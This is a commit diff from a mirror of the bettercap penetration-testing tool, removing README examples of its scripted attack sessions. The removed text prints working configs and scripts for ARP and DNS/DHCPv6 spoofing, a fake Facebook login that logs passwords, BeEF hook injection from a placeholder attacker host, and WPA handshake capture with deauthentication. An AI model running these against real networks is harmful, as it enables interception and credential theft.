github/bettercap
1
0
Fork 0
mirror of https://github.com/bettercap/bettercap synced 2025-08-14 10:46:57 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

misc: small fix or general refactoring i did not bother commenting

Browse source
This commit is contained in:
evilsocket 2018-02-23 00:26:19 +01:00
commit 6b178afc4d
1 changed files with 1 additions and 249 deletions
Download patch file Download diff file Expand all files Collapse all files

250
README.md
View file

@ -122,255 +122,7 @@ And finally, you can access and use any variable that has been declared in the i
## Caplets
Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more.
#### caplets/http-req-dump.cap
Execute an ARP spoofing attack on the whole network (by default) or on a host (using `-eval` as described), intercept HTTP and HTTPS requests with the `http.proxy` and `https.proxy` modules and dump them using the `http-req-dumsp.js` proxy script.
```sh
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
# to make it less verbose
# events.stream off
# discover a few hosts
net.probe on
sleep 1
net.probe off
# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on
# we'll use this proxy script to dump requests
set https.proxy.script caplets/http-req-dump.js
set http.proxy.script caplets/http-req-dump.js
clear
# go ^_^
http.proxy on
https.proxy on
arp.spoof on
```
#### caplets/netmon.cap
An example of how to use the `ticker` module, use this caplet to monitor activities on your network.
```sh
net.probe on
clear
ticker on
```
#### caplets/mitm6.cap
[Reroute IPv4 DNS requests by using DHCPv6 replies](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/), start a HTTP server and DNS spoofer for `microsoft.com` and `google.com`.
```sh
# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com
# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www
# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on
# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear
```
<center>
<img src="https://pbs.twimg.com/media/DTXrMJJXcAE-NcQ.jpg:large" width="100%"/>
</center>
#### caplets/rest-api.cap
Start a rest API.
```sh
# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082
# actively probe network for new hosts
net.probe on
# enjoy /api/session and /api/events
api.rest on
```
Get information about the current session:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/session
Execute a command in the current interactive session:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'
Get last 50 events:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/events?n=50
Clear events:
curl -k --user bcap:bcap -X DELETE https://bettercap-ip:8083/api/events
<center>
<img src="https://pbs.twimg.com/media/DTAreSCX4AAXX6v.jpg:large" width="100%"/>
</center>
#### caplets/fb-phish.cap
This caplet will create a fake Facebook login page on port 80, intercept login attempts using the `http.proxy`, print credentials and redirect the target to the real Facebook.
<center>
<img src="https://pbs.twimg.com/media/DTY39bnXcAAg5jX.jpg:large" width="100%"/>
</center>
Make sure to create the folder first:
$ cd caplets/www/
$ make
```sh
set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/
set http.proxy.script caplets/fb-phish.js
http.proxy on
http.server on
```
The `caplets/fb-phish.js` proxy script file:
```javascript
function onRequest(req, res) {
if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
var form = req.ParseForm();
var email = form["email"] || "?",
pass = form["pass"] || "?";
log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );
res.Status = 301;
res.Headers = "Location: https://www.facebook.com/\n" +
"Connection: close";
}
}
```
#### caplets/beef-inject.cap
Use a proxy script to inject a BEEF javascript hook:
```sh
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"
# inject beef hook
set http.proxy.script caplets/beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
```
The `caplets/beef.inject.js` proxy script file:
```javascript
function onLoad() {
console.log( "BeefInject loaded." );
console.log("targets: " + env['arp.spoof.targets']);
}
function onResponse(req, res) {
if( res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
if( body.indexOf('</head>') != -1 ) {
res.Body = body.replace(
'</head>',
'<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>'
);
}
}
}
```
#### caplets/airmon.cap
Put a wifi interface in monitor mode and listen for frames in order to detect WiF access points and clients.
```
set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
set ticker.commands clear; wifi.show
# uncomment to disable channel hopping
# set wifi.recon.channel 1
wifi.recon on
ticker on
events.clear
clear
```
#### caplets/wpa\_handshake.cap
Use various modules to inject wifi frames performing a deauthentication attack, while a sniffer is waiting for WPA handshakes.
```
# swag prompt for wifi
set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
# Sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap
net.sniff on
# since we need to capture the handshake, we can't hop
# through channels but we need to stick to the one we're
# interested in otherwise the sniffer might lose packets.
set wifi.recon.channel 1
wifi.recon on
# uncomment to recon clients of a specific AP given its BSSID
# wifi.recon DE:AD:BE:EF:DE:AD
events.clear
clear
# now just deauth clients and wait ^_^
#
# Example:
#
# wifi.deauth AP-BSSID-HERE
#
# This will deauth every client for this specific access point,
# you can put it as ticker.commands to have the ticker module
# periodically deauth clients :D
```
Caplets, or `.cap` files are a powerful way to script bettercap's interactive sessions, think about them as the `.rc` files of Metasploit. You will find updated caplets and modules [in this repository](/bettercap/caplets), you're strongly invited to check it out in order to fully understand the features of this tool.
## License